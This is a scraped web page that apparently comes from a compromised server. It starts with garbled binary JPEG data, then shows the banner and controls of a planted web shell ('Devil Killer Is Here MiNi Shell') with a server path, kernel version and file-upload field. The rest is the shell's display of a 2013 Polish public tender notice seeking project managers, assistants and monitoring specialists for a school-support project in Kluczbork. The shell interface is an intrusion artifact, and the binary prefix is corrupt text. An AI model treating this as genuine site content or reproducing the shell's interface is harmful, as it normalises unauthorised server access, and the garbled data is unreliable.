JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130718/146757-N-2013.html

<p class="kh_header"><b>Kluczbork: Wybór kadry zarządzającej w projekcie Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu kluczborskiego</b><br>
<b>Numer ogłoszenia: 146757 - 2013; data zamieszczenia: 18.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Ośrodek Doskonalenia Nauczycieli w Kluczborku , ul. Byczyńska 7, 46-200 Kluczbork, woj. opolskie, tel. 77 4187249, faks 77 4187249.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://podn.klucznet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór kadry zarządzającej w projekcie Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu kluczborskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór kadry zarządzającej projektem pn: Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu kluczborskiego współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół. 
Projekt realizowany w ramach umowy o dofinansowanie Nr UDA-POKL.03.05.00-00-015/12-00 z dnia 9 maja 2013r.  Celem projektu jest podniesienie jakości funkcjonowania systemu doskonalenia nauczycieli w powiecie kluczborskim poprzez stworzenie w roku szkolnym 2013/2014 i 2014/2015 planów wspomagania i sieci współpracy nauczycieli spójnych z rozwojem szkół i przedszkoli w obszarach wymagających wsparcia.  
Projekt obejmie wsparciem 8 przedszkoli, 22 szkoły podstawowe, 10 szkół gimnazjalnych, 8 szkół Ponadgimnazjalnych oraz nauczycieli / -elek w nich uczących - ok. 700 osób.
Główne zadania w projekcie to:
1.opracowanie koncepcji  wspomagania szkół i przedszkoli w zakresie zmodernizowanego systemu doskonalenia nauczycieli w powiecie kluczborskim;
2.przeprowadzenie procesu wspomagania w szkołach i przedszkolach powiatu kluczborskiego;
3.prowadzenie lokalnych sieci współpracy i samokształcenia w powiecie kluczborskim..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 79.42.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w przedmiotowym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art. 22 ust. 1 - dotyczy wszystkich części zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art. 22 ust. 1 - dotyczy wszystkich części zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art. 22 ust. 1 - dotyczy wszystkich części zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>SZCZEGÓŁOWE WARUNKI DOT. DYSPONOWANIA OSOBAMI ZDOLNYMI DO WYKONANIA ZAMÓWIENIA:

1)  W przypadku CZĘŚCI   I zamówienia - MANAGER  PROJEKTU   
Zamawiający żąda wykazania w wykazie o którym mowa w pkt. 6.2.2) SIWZ, że Wykonawca dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia posiadającą:
a)wykształcenie wyższe II stopnia;
b)udokumentowane doświadczenie w realizacji projektów tj. zarządzanie co najmniej 5 projektami współfinansowanymi ze środków Unii Europejskiej o wartości powyżej 200 000 zł. brutto każdy poprzez pełnienie funkcji kierownika/ koordynatora/managera/ zastępcy  projektu;
c)przynajmniej 3 letnie doświadczenie w zakresie zarządzania zespołem ludzkim nie mniejszym niż 5 osób;
d)znajomość zasad Programu operacyjnego Kapitał ludzki (POKL) w tym równości kobiet i mężczyzn; 
e)znajomość obsługi Podsystemu Monitorowania Europejskiego Funduszu Społecznego 2007 dla POKL (PEFS); 
f)umiejętność obsługi komputera (w tym MS Office, Internetu, Generatora Wniosków Aplikacyjnych i Generatora wniosków Płatniczych); 
g) pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;

2)W przypadku  CZĘŚCI  II  zamówienia -  ASYSTENT MANAGERA  PROJEKTU 
Zamawiający żąda wskazania w wykazie, o którym mowa w pkt. 6.2.2) SIWZ, że Wykonawca dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia posiadającą:
a)wykształcenie wyższe II stopnia;
b)udokumentowane doświadczenie przy realizacji co najmniej 2 projektów współfinansowanych ze środków Unii Europejskiej;
c)min. 2-letnie doświadczenie związane z realizacją postępowań o zamówieniach publicznych zgodnie z ustawą Prawo zamówień publicznych,
d)znajomość obsługi Podsystemu Monitorowania Europejskiego Funduszu Społecznego 2007 dla POKL (PEFS). umiejętność obsługi komputera (w tym MS Office, Internetu, Generatora Wniosków Aplikacyjnych i Generatora wniosków Płatniczych); 
e) posiadającą pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;

3)W przypadku CZĘŚCI  III zamówienia - SPECJALISTA DS. MONITOROWANIA PROJEKTU
Zamawiający żąda wskazania w wykazie, o którym mowa w pkt. 6.2.2) SIWZ, że Wykonawca dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia posiadającą:
a)wykształcenie wyższe II stopnia;
b)prawo jazdy kat. B;
c)znajomość obsługi Podsystemu Monitorowania Europejskiego Funduszu Społecznego 2007 dla POKL (PEFS); 
d)pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;
e)udokumentowane co najmniej 5-letnie doświadczenie w pracy w administracji publicznej;
f)udokumentowane co najmniej 3-letnie doświadczenie w pracy na rzecz systemu oświaty;

4)W przypadku CZĘŚCI IV zamówienia - SPECJALISTA DS. MONITOROWANIA PROJEKTU 
Zamawiający żąda wskazania w wykazie, o którym mowa w pkt. 6.2.2) SIWZ, że Wykonawca dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia posiadającą:
a)wykształcenie wyższe II stopnia;
b)prawo jazdy kat. B;
c)znajomość obsługi Podsystemu Monitorowania Europejskiego Funduszu Społecznego 2007 dla POKL (PEFS);
d)pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;
e)udokumentowane co najmniej 5-letnie doświadczenie w pracy w administracji publicznej;
g)udokumentowane co najmniej 3-letnie doświadczenie w pracy na rzecz systemu oświaty;

5)W przypadku  CZĘŚCI V zamówienia  - KOORDYNATOR MERYTORYCZNY PROJEKTU
Zamawiający żąda wskazania w wykazie, o którym mowa w pkt. 6.2.2) SIWZ, że Wykonawca dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia posiadającą:
a)	wykształcenie wyższe II stopnia;
b)	 znajomość obsługi Podsystemu Monitorowania Europejskiego Funduszu Społecznego 2007 dla POKL (PEFS);
c)	pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;
d)	udokumentowane co najmniej 5-letnie doświadczenie w  pracy w administracji publicznej;
e)	udokumentowane co najmniej 3-letnie doświadczenie w pracy  na rzecz systemu oświaty;
f)	potwierdzone kompetencje w zakresie zarządzania zespołem.


5) W przypadku CZĘŚCI VI zamówienia - ADMINISTRATOR PODSTRONY INTERNETOWEJ  PROJEKTU 

Zamawiający żąda wskazania w wykazie, o którym mowa w pkt. 6.2.2) SIWZ, że Wykonawca dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia posiadającą:
a)wykształcenie wyższe II stopnia;
b)udokumentowaną znajomość zasad tworzenia narzędzi i technik wirtualnych;
c)doświadczenie w wykonaniu co najmniej 2 zamówień w okresie ostatnich 3 lat  obejmujących swoim zakresem utworzenie, administrowanie i aktualizację stron www zbudowanych w oparciu o znaczniki i kaskadowe arkusze stylów (CSS) z wykorzystaniem baz danych. Zakres wykonanych usług powinien  obejmować administrowanie stroną, zarządzanie bazami danych, wprowadzanie treści, dodawanie do serwisu nowych podstron, wprowadzanie grafiki, obróbka i optymalizacja grafiki, aktualizacja dynamicznych galerii, archiwizacja strony, modyfikowanie css, rozbudowa serwisu o nowe funkcjonalności/moduły z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączenie dowodów, czy zostały wykonane należycie.
d)pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;

Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu nastąpi wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych przez Zamawiającego i wyszczególnionych w SIWZ, dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art. 22 ust. 1 - dotyczy wszystkich części zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty. Zmiany mogą dotyczyć następujących sytuacji:
a)jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
b)terminu wykonania usług w przypadku wystąpienia okoliczności nieprzewidywalnych w dniu udzielenia zamówienia, zwłaszcza jeżeli ze względu na przedłużającą się procedurę przetargową nie będzie możliwe rozpoczęcie realizacji umowy od dnia 1 września  2013r. wówczas umowa zostanie podpisana w okresie późniejszym, z tym że liczba godzin do zrealizowania w miesiącu nie ulegnie zmianie. 
c)zmiany osób występujących po stronie Zamawiającego i Wykonawcy w przypadku wystąpienia zdarzeń losowych. W przypadku Wykonawcy np. gdy ze względu na dłuższą nieobecność osoby prowadzącej wskazanej w ofercie (macierzyństwo, choroba, itp. zdarzenia losowe) nie będzie możliwe prowadzenie przez nią funkcji wówczas osoba ta ulegnie zmianie na inną, która będzie musiała spełniać warunki udziału w postępowaniu; wówczas wynagrodzenie osoby dotychczas sprawującej daną  funkcję zostanie wypłacone proporcjonalnie do ilości udokumentowanej liczby godzin. 
d)sposobu i okresu fakturowania usług,
e)zaistnieją inne zdarzenia pod warunkiem, że nie spowoduje to zmian w przedmiocie zamówienia. 
f)gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawcą stroną w szczególności Instytucją Pośredniczącą.
g)gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych i zaleceń dotyczących POKL.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://podn.klucznet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Ośrodek Doskonalenia Nauczycieli w Kluczborku
ul. Byczyńska 7;  46-200 Kluczbork.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2013 godzina 09:30, miejsce: Powiatowy Ośrodek Doskonalenia Nauczycieli w Kluczborku
ul. Byczyńska 7;  46-200 Kluczbork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Manager  projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca na umowę cywilno - prawną, szacowana liczba godzin w miesiącu 80 godz. Łączna max. liczba godzin w okresie realizacji umowy 1920 godz.  Zadania Managera  Projektu obejmują w szczególności:
1)zarządzanie i nadzorowanie realizacji wszystkich etapów projektu zgodnie z umową o dofinansowanie projektu, wnioskiem aplikacyjnym i przepisami unijnymi oraz krajowymi w zakresie Programu Operacyjnego Kapitał Ludzki (POKL) w tym m.in. wytycznymi w zakresie kwalifikowalności wydatków POKL. 
2)Planowanie, koordynacja oraz nadzorowanie pracy osób zaangażowanych we wdrażanie projektu;
3)Weryfikacja rezultatów poszczególnych etapów prac;
4)Zapewnienie zgodności prowadzonych działań z budżetem i harmonogramem projektu;
5)Przygotowanie wniosków o płatność;
6)Monitorowanie postępu rzeczowo - finansowego;
7)Prowadzenie dokumentacji merytorycznej i finansowej projektu;
8)Kontrola wewnętrzna przebiegu działań projektu;
9)Bieżące planowanie, zarządzanie i sterowanie;
10)Nadzór nad organizacją pracy biura;
11)Organizacja zespołu projektowego;
12)Nadzór nad doborem kadry ekspertów.
13)Podział obowiązków dla poszczególnych pracowników projektu i kontrola ich wykonania 
14)Nadzór nad finansami projektu, planowanie finansowe,
15)Monitorowanie dokumentacji projektu oraz zgodności z harmonogramem projektu;
16)Nadzór nad przestrzeganiem zasad Programu operacyjnego Kapitał ludzki (POKL) w tym równości kobiet i mężczyzn;
17)Przeszkolenie zespołu projektowego z zakresu zasady równości kobiet i mężczyzn, 
18)Nadzór nad działaniami z zakresu monitoringu projektu;
19)Nadzór nad informacją i promocją zgodną z Wytycznymi POKL;
20)Nadzór nad realizacja projektu w zakresie zgodności z zasadami prawa zamówień publicznych;
21)Opracowywanie wniosków o płatność we współpracy z asystentem managera projektu
22)Przygotowywanie sprawozdań wewnętrznych z realizacji projektu dla dyrektora PODN w Kluczborku. 
23)przestrzeganie i nadzorowanie przetwarzania danych osobowych w projekcie, zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101, poz. 926 z późn. zm.); 
24)monitorowanie przepływu uczestników w Projekcie i nadzór nad prawidłowym stosowaniem przepisów dotyczących ochrony danych osobowych;
25)odpowiedzialność za bieżące planowanie, zarządzanie i sterowanie. 
26)Weryfikacja pod względem merytorycznym dokumentów, wytworzonych w trakcie trwania realizacji projektu;
27)koordynacja działań projektu i zapewnienie płynności ich realizacji zgodnie z założeniami projektu oraz z zapisami umowy o dofinansowanie projektu
Zakres i wielkość zamówienia określono maksymalną ilością godzin 1920 oraz kwotą 25 zł brutto za godzinę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ASYSTENT MANAGERA  PROJEKTU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca na umowę cywilno - prawną,  szacowana liczba godzin w miesiącu -  60 godz., łączna max. liczba godzin w okresie realizacji umowy - 1440 godz.Zadania asystenta managera projektu  obejmują w szczególności:
1)Nadzór nad  bazą danych Podsystemu Monitorowania Europejskiego Funduszu Społecznego 2007 (PEFS);
2)Przestrzeganie i nadzorowanie przetwarzania danych osobowych w projekcie, zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101, poz. 926 z późn. zm.); 
3)Monitorowanie przepływu uczestników w Projekcie i nadzór nad prawidłowym stosowaniem przepisów dotyczących ochrony danych osobowych
4)Współtworzenie sprawozdań wewnętrznych z realizacji projektu dla dyrektora PODN w Kluczborku,
5)Nadzór nad poziomem realizacji poszczególnych zadań w ramach projektu,
6)Współprowadzenie monitoringu finansowego (monitoring poziomu wykorzystania środków w poszczególnych pozycjach budżetowych, analiza wpływu transz),
7)Prowadzenie postępowań w ramach ustawy prawo zamówień publicznych oraz zapytań ofertowych zgodnie z wytycznymi Programu Operacyjnego Kapitał Ludzki i zasadą efektywnego zarządzania finansami jak również  ustawą o finansach publicznych w tym opracowywanie projektów Specyfikacji Istotnych Warunków Zamówienia (SIWZ), sporządzanie umów, porozumiewanie się z wykonawcami w celu zaistnienia wątpliwości i zapytań do SIWZ w związku z realizacją projektu,
8)Udział w przygotowaniu wniosków o płatność we współpracy z managerem projektu;
9)Prowadzenie informacji i promocji projektu;
10)Bezpośrednie podleganie managerowi projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SPECJALISTA DS. MONITOROWANIA PROJEKTU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca na umowę cywilno - prawną,  szacowana liczba godzin w miesiącu - 40 godz. z wyłączeniem okresu wakacyjnego tj. miesięcy lipiec, sierpień w roku 2014 i w roku 2015, łączna max. liczba godzin w okresie realizacji umowy - 800 godz.
Zadania Specjalisty ds. monitorowania projektu  obejmują w szczególności:
1)Realizacja procesu rekrutacji poprzez stworzenie baz danych Podsystemu Monitorowania Europejskiego Funduszu Społecznego 2007 (PEFS), list teleadresowych;
2)Organizacja spotkań rekrutacyjnych, prowadzenie rekrutacji poprzez podstronę PODN w Kluczborku, bezpośredni kontakt z dyrektorami/ nauczycielami  danych placówek, poprzez kanały internetowe;
3)Opracowanie strategii rekrutacji zawierającej przede wszystkim profil kandydata na uczestnika projektu, metody i techniki rekrutacji;
4)Udzielanie informacji w zakresie rekrutacji, obsługa techniczna procesu rekrutacji;
5)Tworzenie list rekrutacyjnych;
